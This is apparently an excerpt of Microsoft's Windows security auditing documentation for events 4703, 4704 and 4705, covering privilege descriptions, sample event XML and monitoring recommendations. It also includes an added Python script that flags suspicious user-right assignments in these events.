a process to replace the default token
associated with a started subprocess.

SeAuditPrivilege Generate security audits With this privilege, the user can add
entries to the security log.

SeBackupPrivilege Back up files and directories - Required to perform backup


operations.
With this privilege, the user can bypass
file and directory, registry, and other
persistent object permissions for the
purposes of backing up the system.
This privilege causes the system to
grant all read access control to any file,
regardless of the access control list
(ACL) specified for the file. Any access
request other than read is still
evaluated with the ACL. The following
access rights are granted if this privilege
is held:
READ_CONTROL
ACCESS_SYSTEM_SECURITY
FILE_GENERIC_READ
FILE_TRAVERSE
PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeChangeNotifyPrivilege Bypass traverse checking Required to receive notifications of


changes to files or directories. This
privilege also causes the system to skip
all traversal access checks.
With this privilege, the user can
traverse directory trees even though
the user may not have permissions on
the traversed directory. This privilege
does not allow the user to list the
contents of a directory, only to traverse
directories.

SeCreateGlobalPrivilege Create global objects Required to create named file mapping


objects in the global namespace during
Terminal Services sessions.

SeCreatePagefilePrivilege Create a pagefile With this privilege, the user can create
and change the size of a pagefile.

SeCreatePermanentPrivilege Create permanent shared objects Required to create a permanent object.


This privilege is useful to kernel-mode
components that extend the object
namespace. Components that are
running in kernel mode already have
this privilege inherently; it is not
necessary to assign them the privilege.

SeCreateSymbolicLinkPrivilege Create symbolic links Required to create a symbolic link.

SeCreateTokenPrivilege Create a token object Allows a process to create a token


which it can then use to get access to
any local resources when the process
uses NtCreateToken() or other token-
creation APIs.
When a process requires this privilege,
we recommend using the LocalSystem
account (which already includes the
privilege), rather than creating a
separate user account and assigning
this privilege to it.

SeDebugPrivilege Debug programs Required to debug and adjust the


memory of a process owned by
another account.
With this privilege, the user can attach
a debugger to any process or to the
kernel. Developers who are debugging
their own applications do not need this
user right. Developers who are
debugging new system components
need this user right. This user right
provides complete access to sensitive
and critical operating system
components.
PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeEnableDelegationPrivilege Enable computer and user accounts to Required to mark user and computer
be trusted for delegation accounts as trusted for delegation.
With this privilege, the user can set the
Trusted for Delegation setting on a
user or computer object.
The user or object that is granted this
privilege must have write access to the
account control flags on the user or
computer object. A server process
running on a computer (or under a user
context) that is trusted for delegation
can access resources on another
computer using the delegated
credentials of a client, as long as the
account of the client does not have the
Account cannot be delegated
account control flag set.

SeImpersonatePrivilege Impersonate a client after With this privilege, the user can
authentication impersonate other accounts.

SeIncreaseBasePriorityPrivilege Increase scheduling priority Required to increase the base priority of


a process.
With this privilege, the user can use a
process with Write property access to
another process to increase the
execution priority assigned to the other
process. A user with this privilege can
change the scheduling priority of a
process through the Task Manager user
interface.

SeIncreaseQuotaPrivilege Adjust memory quotas for a process Required to increase the quota
assigned to a process.
With this privilege, the user can change
the maximum memory that can be
consumed by a process.

SeIncreaseWorkingSetPrivilege Increase a process working set Required to allocate more memory for
applications that run in the context of
users.

SeLoadDriverPrivilege Load and unload device drivers Required to load or unload a device
driver.
With this privilege, the user can
dynamically load and unload device
drivers or other code in to kernel mode.
This user right does not apply to Plug
and Play device drivers.
PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeLockMemoryPrivilege Lock pages in memory Required to lock physical pages in


memory.
With this privilege, the user can use a
process to keep data in physical
memory, which prevents the system
from paging the data to virtual
memory on disk. Exercising this
privilege could significantly affect
system performance by decreasing the
amount of available random access
memory (RAM).

SeMachineAccountPrivilege Add workstations to domain With this privilege, the user can create a
computer account.
This privilege is valid only on domain
controllers.

SeManageVolumePrivilege Perform volume maintenance tasks Required to run maintenance tasks on a


volume, such as remote
defragmentation.

SeProfileSingleProcessPrivilege Profile single process Required to gather profiling information


for a single process.
With this privilege, the user can use
performance monitoring tools to
monitor the performance of non-
system processes.

SeRelabelPrivilege Modify an object label Required to modify the mandatory


integrity level of an object.

SeRemoteShutdownPrivilege Force shutdown from a remote system Required to shut down a system using
a network request.

SeRestorePrivilege Restore files and directories Required to perform restore operations.


This privilege causes the system to
grant all write access control to any file,
regardless of the ACL specified for the
file. Any access request other than write
is still evaluated with the ACL.
Additionally, this privilege enables you
to set any valid user or group SID as
the owner of a file. The following access
rights are granted if this privilege is
held:
WRITE_DAC
WRITE_OWNER
ACCESS_SYSTEM_SECURITY
FILE_GENERIC_WRITE
FILE_ADD_FILE
FILE_ADD_SUBDIRECTORY
DELETE
With this privilege, the user can bypass
file, directory, registry, and other
persistent objects permissions when
restoring backed up files and directories
and determines which users can set any
valid security principal as the owner of
an object.
PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeSecurityPrivilege Manage auditing and security log Required to perform a number of


security-related functions, such as
controlling and viewing audit events in
security event log.
With this privilege, the user can specify
object access auditing options for
individual resources, such as files, Active
Directory objects, and registry keys.
A user with this privilege can also view
and clear the security log.

SeShutdownPrivilege | Shut down the system | Required to shut down a local system.

SeSyncAgentPrivilege | Synchronize directory service data | This privilege enables the holder to read all objects and properties in the directory, regardless of the protection on the objects and properties. By default, it is assigned to the Administrator and LocalSystem accounts on domain controllers. With this privilege, the user can synchronize all directory service data. This is also known as Active Directory synchronization.

SeSystemEnvironmentPrivilege | Modify firmware environment values | Required to modify the nonvolatile RAM of systems that use this type of memory to store configuration information.

SeSystemProfilePrivilege | Profile system performance | Required to gather profiling information for the entire system. With this privilege, the user can use performance monitoring tools to monitor the performance of system processes.

SeSystemtimePrivilege | Change the system time | Required to modify the system time. With this privilege, the user can change the time and date on the internal clock of the computer. Users that are assigned this user right can affect the appearance of event logs. If the system time is changed, events that are logged will reflect this new time, not the actual time that the events occurred.

SeTakeOwnershipPrivilege | Take ownership of files or other objects | Required to take ownership of an object without being granted discretionary access. This privilege allows the owner value to be set only to those values that the holder may legitimately assign as the owner of an object. With this privilege, the user can take ownership of any securable object in the system, including Active Directory objects, files and folders, printers, registry keys, processes, and threads.

SeTcbPrivilege | Act as part of the operating system | This privilege identifies its holder as part of the trusted computer base. This user right allows a process to impersonate any user without authentication. The process can therefore gain access to the same local resources as that user.

SeTimeZonePrivilege | Change the time zone | Required to adjust the time zone associated with the computer's internal clock.

SeTrustedCredManAccessPrivilege | Access Credential Manager as a trusted caller | Required to access Credential Manager as a trusted caller.

SeUndockPrivilege | Remove computer from docking station | Required to undock a laptop. With this privilege, the user can undock a portable computer from its docking station without logging on.

SeUnsolicitedInputPrivilege | Not applicable | Required to read unsolicited input from a terminal device.

Disabled Privileges [Type = UnicodeString]: the list of disabled user rights. See possible values in the table above.

Security Monitoring Recommendations

For 4703(S): A user right was adjusted.

As of Windows 10, event 4703 is generated by applications or services that dynamically adjust token privileges. An example of such an application is System Center Configuration Manager, which makes WMI queries at recurring intervals and quickly generates a large number of 4703 events (with the WMI activity listed as coming from svchost.exe). If you are using an application or system service that makes changes to system privileges through the AdjustTokenPrivileges API, you might need to disable Success auditing for this subcategory, Audit Authorization Policy Change, or work with a very high volume of event 4703.

Otherwise, see the recommendations in the following table.

TYPE OF MONITORING REQUIRED | RECOMMENDATION

High-value accounts: You might have high-value domain or local accounts for which you need to monitor each action. Examples of high-value accounts are database administrators, built-in local administrator account, domain administrators, service accounts, domain controller accounts and so on. | Monitor this event with the “Subject\Security ID” that corresponds to the high-value account or accounts.

Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use of an account outside of working hours. | When you monitor for anomalies or malicious actions, use the “Subject\Security ID” (with other information) to monitor how or when a particular account is being used.

Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should never be used. | Monitor this event with the “Subject\Security ID” or “Target Account\Security ID” that correspond to the accounts that should never be used.

Account whitelist: You might have a specific whitelist of accounts that are the only ones allowed to perform actions corresponding to particular events. | If this event corresponds to a “whitelist-only” action, review the “Subject\Security ID” for accounts that are outside the whitelist. Also check the “Target Account\Security ID” and “Enabled Privileges” to see what was enabled.

Accounts of different types: You might want to ensure that certain actions are performed only by certain account types, for example, local or domain account, machine or user account, vendor or employee account, and so on. | If this event corresponds to an action you want to monitor for certain account types, review the “Subject\Security ID” to see whether the account type is as expected.

External accounts: You might be monitoring accounts from another domain, or “external” accounts that are not allowed to perform certain actions (represented by certain specific events). | Monitor this event for the “Subject\Account Domain” corresponding to accounts from another domain or “external” accounts.

Restricted-use computers or devices: You might have certain computers, machines, or devices on which certain people (accounts) should perform only limited actions, or no actions at all. | Monitor the target Computer: (or other target device) for actions performed by the “Subject\Security ID” that you are concerned about. Also check “Target Account\Security ID” to see whether the change in privileges should be made on that computer for that account.

User rights that should be restricted or monitored: You might have a list of user rights that you want to restrict or monitor. | Monitor this event and compare the “Enabled Privileges” to your list of user rights. Trigger an alert for user rights that should not be enabled, especially on high-value servers or other computers. For example, you might have SeDebugPrivilege on a list of user rights to be restricted.

Account naming conventions: Your organization might have specific naming conventions for account names. | Monitor “Subject\Account Name” for names that don’t comply with naming conventions.
4704(S): A user right was assigned.
4/5/2019 • 12 minutes to read

Applies to
Windows 10
Windows Server 2016

Subcategory: Audit Authorization Policy Change

Event Description:
This event generates every time the local user right policy is changed and a user right is assigned to an account.
You will see a unique event for every user.

Note: For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4704</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13570</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-10-02T22:08:07.136050600Z" />
    <EventRecordID>1049866</EventRecordID>
    <Correlation />
    <Execution ProcessID="500" ThreadID="1216" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-18</Data>
    <Data Name="SubjectUserName">DC01$</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x3e7</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="PrivilegeList">SeAuditPrivilege SeIncreaseWorkingSetPrivilege</Data>
  </EventData>
</Event>
Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.

Field Descriptions:

Subject:
Security ID [Type = SID]: SID of the account that made a change to local user right policy. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made a change to local user right policy.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
  Domain NETBIOS name example: CONTOSO
  Lowercase full domain name: contoso.local
  Uppercase full domain name: CONTOSO.LOCAL
  For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
  For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”

Target Account:
Account Name [Type = SID]: the SID of the security principal for which user rights were assigned. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

New Right:
User Right [Type = UnicodeString]: the list of assigned user rights. This event generates only for user rights, not logon rights. Here is the list of possible user rights:

PRIVILEGE NAME | USER RIGHT GROUP POLICY NAME | DESCRIPTION

SeAssignPrimaryTokenPrivilege | Replace a process-level token | Required to assign the primary token of a process. With this privilege, the user can initiate a process to replace the default token associated with a started subprocess.

SeAuditPrivilege | Generate security audits | With this privilege, the user can add entries to the security log.

SeBackupPrivilege | Back up files and directories | Required to perform backup operations. With this privilege, the user can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system. This privilege causes the system to grant all read access control to any file, regardless of the access control list (ACL) specified for the file. Any access request other than read is still evaluated with the ACL. The following access rights are granted if this privilege is held: READ_CONTROL, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_READ, FILE_TRAVERSE.

SeChangeNotifyPrivilege | Bypass traverse checking | Required to receive notifications of changes to files or directories. This privilege also causes the system to skip all traversal access checks. With this privilege, the user can traverse directory trees even though the user may not have permissions on the traversed directory. This privilege does not allow the user to list the contents of a directory, only to traverse directories.

SeCreateGlobalPrivilege | Create global objects | Required to create named file mapping objects in the global namespace during Terminal Services sessions.

SeCreatePagefilePrivilege | Create a pagefile | With this privilege, the user can create and change the size of a pagefile.

SeCreatePermanentPrivilege | Create permanent shared objects | Required to create a permanent object. This privilege is useful to kernel-mode components that extend the object namespace. Components that are running in kernel mode already have this privilege inherently; it is not necessary to assign them the privilege.

SeCreateSymbolicLinkPrivilege | Create symbolic links | Required to create a symbolic link.

SeCreateTokenPrivilege | Create a token object | Allows a process to create a token which it can then use to get access to any local resources when the process uses NtCreateToken() or other token-creation APIs. When a process requires this privilege, we recommend using the LocalSystem account (which already includes the privilege), rather than creating a separate user account and assigning this privilege to it.

SeDebugPrivilege | Debug programs | Required to debug and adjust the memory of a process owned by another account. With this privilege, the user can attach a debugger to any process or to the kernel. Developers who are debugging their own applications do not need this user right. Developers who are debugging new system components need this user right. This user right provides complete access to sensitive and critical operating system components.

SeEnableDelegationPrivilege | Enable computer and user accounts to be trusted for delegation | Required to mark user and computer accounts as trusted for delegation. With this privilege, the user can set the Trusted for Delegation setting on a user or computer object. The user or object that is granted this privilege must have write access to the account control flags on the user or computer object. A server process running on a computer (or under a user context) that is trusted for delegation can access resources on another computer using the delegated credentials of a client, as long as the account of the client does not have the Account cannot be delegated account control flag set.

SeImpersonatePrivilege | Impersonate a client after authentication | With this privilege, the user can impersonate other accounts.

SeIncreaseBasePriorityPrivilege | Increase scheduling priority | Required to increase the base priority of a process. With this privilege, the user can use a process with Write property access to another process to increase the execution priority assigned to the other process. A user with this privilege can change the scheduling priority of a process through the Task Manager user interface.

SeIncreaseQuotaPrivilege | Adjust memory quotas for a process | Required to increase the quota assigned to a process. With this privilege, the user can change the maximum memory that can be consumed by a process.

SeIncreaseWorkingSetPrivilege | Increase a process working set | Required to allocate more memory for applications that run in the context of users.

SeLoadDriverPrivilege | Load and unload device drivers | Required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers.

SeLockMemoryPrivilege | Lock pages in memory | Required to lock physical pages in memory. With this privilege, the user can use a process to keep data in physical memory, which prevents the system from paging the data to virtual memory on disk. Exercising this privilege could significantly affect system performance by decreasing the amount of available random access memory (RAM).

SeMachineAccountPrivilege | Add workstations to domain | With this privilege, the user can create a computer account. This privilege is valid only on domain controllers.

SeManageVolumePrivilege | Perform volume maintenance tasks | Required to run maintenance tasks on a volume, such as remote defragmentation.

SeProfileSingleProcessPrivilege | Profile single process | Required to gather profiling information for a single process. With this privilege, the user can use performance monitoring tools to monitor the performance of non-system processes.

SeRelabelPrivilege | Modify an object label | Required to modify the mandatory integrity level of an object.

SeRemoteShutdownPrivilege | Force shutdown from a remote system | Required to shut down a system using a network request.

SeRestorePrivilege | Restore files and directories | Required to perform restore operations. This privilege causes the system to grant all write access control to any file, regardless of the ACL specified for the file. Any access request other than write is still evaluated with the ACL. Additionally, this privilege enables you to set any valid user or group SID as the owner of a file. The following access rights are granted if this privilege is held: WRITE_DAC, WRITE_OWNER, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_WRITE, FILE_ADD_FILE, FILE_ADD_SUBDIRECTORY, DELETE. With this privilege, the user can bypass file, directory, registry, and other persistent object permissions when restoring backed up files and directories, and determines which users can set any valid security principal as the owner of an object.

SeSecurityPrivilege | Manage auditing and security log | Required to perform a number of security-related functions, such as controlling and viewing audit events in the security event log. With this privilege, the user can specify object access auditing options for individual resources, such as files, Active Directory objects, and registry keys. A user with this privilege can also view and clear the security log.

SeShutdownPrivilege | Shut down the system | Required to shut down a local system.

SeSyncAgentPrivilege | Synchronize directory service data | This privilege enables the holder to read all objects and properties in the directory, regardless of the protection on the objects and properties. By default, it is assigned to the Administrator and LocalSystem accounts on domain controllers. With this privilege, the user can synchronize all directory service data. This is also known as Active Directory synchronization.

SeSystemEnvironmentPrivilege | Modify firmware environment values | Required to modify the nonvolatile RAM of systems that use this type of memory to store configuration information.

SeSystemProfilePrivilege | Profile system performance | Required to gather profiling information for the entire system. With this privilege, the user can use performance monitoring tools to monitor the performance of system processes.

SeSystemtimePrivilege | Change the system time | Required to modify the system time. With this privilege, the user can change the time and date on the internal clock of the computer. Users that are assigned this user right can affect the appearance of event logs. If the system time is changed, events that are logged will reflect this new time, not the actual time that the events occurred.

SeTakeOwnershipPrivilege | Take ownership of files or other objects | Required to take ownership of an object without being granted discretionary access. This privilege allows the owner value to be set only to those values that the holder may legitimately assign as the owner of an object. With this privilege, the user can take ownership of any securable object in the system, including Active Directory objects, files and folders, printers, registry keys, processes, and threads.

SeTcbPrivilege | Act as part of the operating system | This privilege identifies its holder as part of the trusted computer base. This user right allows a process to impersonate any user without authentication. The process can therefore gain access to the same local resources as that user.

SeTimeZonePrivilege | Change the time zone | Required to adjust the time zone associated with the computer's internal clock.

SeTrustedCredManAccessPrivilege | Access Credential Manager as a trusted caller | Required to access Credential Manager as a trusted caller.

SeUndockPrivilege | Remove computer from docking station | Required to undock a laptop. With this privilege, the user can undock a portable computer from its docking station without logging on.

SeUnsolicitedInputPrivilege | Not applicable | Required to read unsolicited input from a terminal device.

Security Monitoring Recommendations

For 4704(S): A user right was assigned.

TYPE OF MONITORING REQUIRED | RECOMMENDATION

Actions typically performed by the SYSTEM account: This event and certain other events should be monitored to see if they are triggered by any account other than SYSTEM. | Because this event is typically triggered by the SYSTEM account, we recommend that you report it whenever “Subject\Security ID” is not SYSTEM.

High-value accounts: You might have high-value domain or local accounts for which you need to monitor each action. Examples of high-value accounts are database administrators, built-in local administrator account, domain administrators, service accounts, domain controller accounts and so on. | Monitor this event with the “Subject\Security ID” that corresponds to the high-value account or accounts.

Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use of an account outside of working hours. | When you monitor for anomalies or malicious actions, use the “Subject\Security ID” (with other information) to monitor how or when a particular account is being used.

Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should never be used. | Monitor this event with the “Subject\Security ID” or “Target Account\Account Name” that correspond to the accounts that should never be used.

Account whitelist: You might have a specific whitelist of accounts that are the only ones allowed to perform actions corresponding to particular events. | If this event corresponds to a “whitelist-only” action, review the “Subject\Security ID” for accounts that are outside the whitelist. Also check the “Target Account\Account Name” and “New Right” to see what was enabled.

Accounts of different types: You might want to ensure that certain actions are performed only by certain account types, for example, local or domain account, machine or user account, vendor or employee account, and so on. | If this event corresponds to an action you want to monitor for certain account types, review the “Subject\Security ID” to see whether the account type is as expected.

External accounts: You might be monitoring accounts from another domain, or “external” accounts that are not allowed to perform certain actions (represented by certain specific events). | Monitor this event for the “Subject\Account Domain” corresponding to accounts from another domain or “external” accounts.

Restricted-use computers or devices: You might have certain computers, machines, or devices on which certain people (accounts) should perform only limited actions, or no actions at all. | Monitor the target Computer: (or other target device) for actions performed by the “Subject\Security ID” that you are concerned about. Also check “Target Account\Account Name” to see whether the change in rights should be made on that computer for that account.

User rights that should be restricted or monitored: You might have a list of user rights that you want to restrict or monitor. | Monitor this event and compare the “New Right\User Right” to your list of user rights, to see whether the right should be assigned to “Target Account\Account Name.” Trigger an alert for user rights that should not be enabled, especially on high-value servers or other computers. For example, your list of restricted rights might say that only administrative accounts should have SeAuditPrivilege. As another example, your list might say that no accounts should have SeTcbPrivilege or SeDebugPrivilege.

Account naming conventions: Your organization might have specific naming conventions for account names. | Monitor “Subject\Account Name” for names that don’t comply with naming conventions.
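The SYSTEM-subject and restricted-right checks from the table above, run over the page's 4704 sample event and two constructed events, as an added example that is not Microsoft's code. The restricted-right sets, the Administrator SID (RID 500) and the constructed events are assumptions; the parser also accepts 4705, whose Event XML later on this page carries the same fields, and applying the SYSTEM-subject check to 4705 is this example's assumption.

```python
"""Rule checks for 4704 (user right assigned) and 4705 (user right removed),
following the monitoring recommendations table for 4704 on this page.
Added example, not Microsoft's code: the policy sets, the Administrator SID
and the sample events below are constructed for the demonstration."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
SYSTEM_SID = "S-1-5-18"  # Subject\Security ID seen when the system itself applies policy

# Constructed policy, following the "User rights that should be restricted" row:
# no account should receive these rights ...
FORBIDDEN_RIGHTS = {"SeTcbPrivilege", "SeDebugPrivilege"}
# ... and only administrative accounts should receive these.
ADMIN_ONLY_RIGHTS = {"SeAuditPrivilege"}
# Hypothetical SID of the built-in Administrator (RID 500) in the sample domain.
ADMIN_SIDS = {"S-1-5-21-3457937927-2839227994-823803824-500"}


def parse_event(xml_text):
    """Extract the fields the recommendations table refers to from one event."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    data = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}
    return {
        "event_id": int(system.findtext("e:EventID", namespaces=NS)),
        "computer": system.findtext("e:Computer", namespaces=NS),
        "subject_sid": data.get("SubjectUserSid", ""),
        "subject": data.get("SubjectDomainName", "") + "\\" + data.get("SubjectUserName", ""),
        "target_sid": data.get("TargetSid", ""),
        # PrivilegeList is space separated, e.g. "SeAuditPrivilege SeIncreaseWorkingSetPrivilege"
        "rights": data.get("PrivilegeList", "").split(),
    }


def evaluate(event):
    """Return (rule, detail) findings for one parsed 4704/4705 event."""
    findings = []
    if event["event_id"] not in (4704, 4705):
        return findings
    verb = "assigned" if event["event_id"] == 4704 else "removed"
    # Row 1 of the table: report whenever Subject\Security ID is not SYSTEM.
    if event["subject_sid"] != SYSTEM_SID:
        rights = " ".join(event["rights"])
        findings.append(("subject_not_system",
                         f"{event['subject']} ({event['subject_sid']}) {verb} {rights} "
                         f"on {event['computer']}"))
    if event["event_id"] != 4704:
        return findings
    # "User rights that should be restricted": compare New Right\User Right to the policy.
    for right in event["rights"]:
        if right in FORBIDDEN_RIGHTS:
            findings.append(("forbidden_right", f"{right} assigned to {event['target_sid']}"))
        elif right in ADMIN_ONLY_RIGHTS and event["target_sid"] not in ADMIN_SIDS:
            findings.append(("admin_only_right",
                             f"{right} assigned to non-admin {event['target_sid']}"))
    return findings


def _event_xml(event_id, subject_sid, subject_name, target_sid, rights):
    """Build a constructed event in the layout of the page's Event XML."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" />
    <EventID>{event_id}</EventID>
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
  </System>
  <EventData>
    <Data Name="SubjectUserSid">{subject_sid}</Data>
    <Data Name="SubjectUserName">{subject_name}</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x3e7</Data>
    <Data Name="TargetSid">{target_sid}</Data>
    <Data Name="PrivilegeList">{rights}</Data>
  </EventData>
</Event>"""


TARGET_1104 = "S-1-5-21-3457937927-2839227994-823803824-1104"
# The page's own 4704 sample: SYSTEM assigns two rights to the RID 1104 account.
SAMPLE_PAGE_4704 = _event_xml(4704, SYSTEM_SID, "DC01$", TARGET_1104,
                              "SeAuditPrivilege SeIncreaseWorkingSetPrivilege")
# Constructed: an administrator logon (not SYSTEM) hands SeDebugPrivilege to RID 1104.
SAMPLE_SUSPICIOUS = _event_xml(4704, "S-1-5-21-3457937927-2839227994-823803824-500",
                               "Administrator", TARGET_1104, "SeDebugPrivilege")
# The page's 4705 sample: SYSTEM removes SeTimeZonePrivilege from RID 1104.
SAMPLE_PAGE_4705 = _event_xml(4705, SYSTEM_SID, "DC01$", TARGET_1104, "SeTimeZonePrivilege")

SAMPLES = [("page_4704", SAMPLE_PAGE_4704), ("suspicious", SAMPLE_SUSPICIOUS),
           ("page_4705", SAMPLE_PAGE_4705)]


def run_samples():
    """Evaluate every sample; returns {sample name: [rule names fired]}."""
    return {name: [rule for rule, _ in evaluate(parse_event(xml))] for name, xml in SAMPLES}


if __name__ == "__main__":
    for name, xml in SAMPLES:
        for rule, detail in evaluate(parse_event(xml)):
            print(f"{name}: {rule}: {detail}")
```

On the page's own sample the only finding is SeAuditPrivilege going to a non-administrative SID; the 4705 sample produces none.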
4705(S): A user right was removed.
4/5/2019 • 12 minutes to read

Applies to
Windows 10
Windows Server 2016

Subcategory: Audit Authorization Policy Change

Event Description:
This event generates every time the local user right policy is changed and a user right is removed from an account.
You will see a unique event for every user.

Note: For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4705</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13570</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-10-02T22:08:07.152488600Z" />
    <EventRecordID>1049867</EventRecordID>
    <Correlation />
    <Execution ProcessID="500" ThreadID="1216" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-18</Data>
    <Data Name="SubjectUserName">DC01$</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x3e7</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="PrivilegeList">SeTimeZonePrivilege</Data>
  </EventData>
</Event>
Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.

Field Descriptions:

Subject:
Security ID [Type = SID]: SID of the account that made a change to local user right policy. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made a change to local user right policy.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
  Domain NETBIOS name example: CONTOSO
  Lowercase full domain name: contoso.local
  Uppercase full domain name: CONTOSO.LOCAL
  For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
  For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”

Target Account:
Account Name [Type = SID]: the SID of the security principal for which user rights were removed. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Removed Right:
User Right [Type = UnicodeString]: the list of removed user rights. This event generates only for user rights, not logon rights. Here is the list of possible user rights:

PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION


PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeAssignPrimaryTokenPrivilege Replace a process-level token Required to assign the primary token of


a process.
With this privilege, the user can initiate
a process to replace the default token
associated with a started subprocess.

SeAuditPrivilege Generate security audits With this privilege, the user can add
entries to the security log.

SeBackupPrivilege Back up files and directories - Required to perform backup


operations.
With this privilege, the user can bypass
file and directory, registry, and other
persistent object permissions for the
purposes of backing up the system.
This privilege causes the system to
grant all read access control to any file,
regardless of the access control list
(ACL) specified for the file. Any access
request other than read is still evaluated
with the ACL. The following access
rights are granted if this privilege is
held:
READ_CONTROL
ACCESS_SYSTEM_SECURITY
FILE_GENERIC_READ
FILE_TRAVERSE

SeChangeNotifyPrivilege Bypass traverse checking Required to receive notifications of


changes to files or directories. This
privilege also causes the system to skip
all traversal access checks.
With this privilege, the user can traverse
directory trees even though the user
may not have permissions on the
traversed directory. This privilege does
not allow the user to list the contents of
a directory, only to traverse directories.

SeCreateGlobalPrivilege Create global objects Required to create named file mapping


objects in the global namespace during
Terminal Services sessions.

SeCreatePagefilePrivilege Create a pagefile With this privilege, the user can create
and change the size of a pagefile.

SeCreatePermanentPrivilege Create permanent shared objects Required to create a permanent object.


This privilege is useful to kernel-mode
components that extend the object
namespace. Components that are
running in kernel mode already have
this privilege inherently; it is not
necessary to assign them the privilege.

SeCreateSymbolicLinkPrivilege Create symbolic links Required to create a symbolic link.


PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeCreateTokenPrivilege Create a token object Allows a process to create a token


which it can then use to get access to
any local resources when the process
uses NtCreateToken() or other token-
creation APIs.
When a process requires this privilege,
we recommend using the LocalSystem
account (which already includes the
privilege), rather than creating a
separate user account and assigning
this privilege to it.

SeDebugPrivilege Debug programs Required to debug and adjust the


memory of a process owned by another
account.
With this privilege, the user can attach a
debugger to any process or to the
kernel. Developers who are debugging
their own applications do not need this
user right. Developers who are
debugging new system components
need this user right. This user right
provides complete access to sensitive
and critical operating system
components.

SeEnableDelegationPrivilege Enable computer and user accounts to Required to mark user and computer
be trusted for delegation accounts as trusted for delegation.
With this privilege, the user can set the
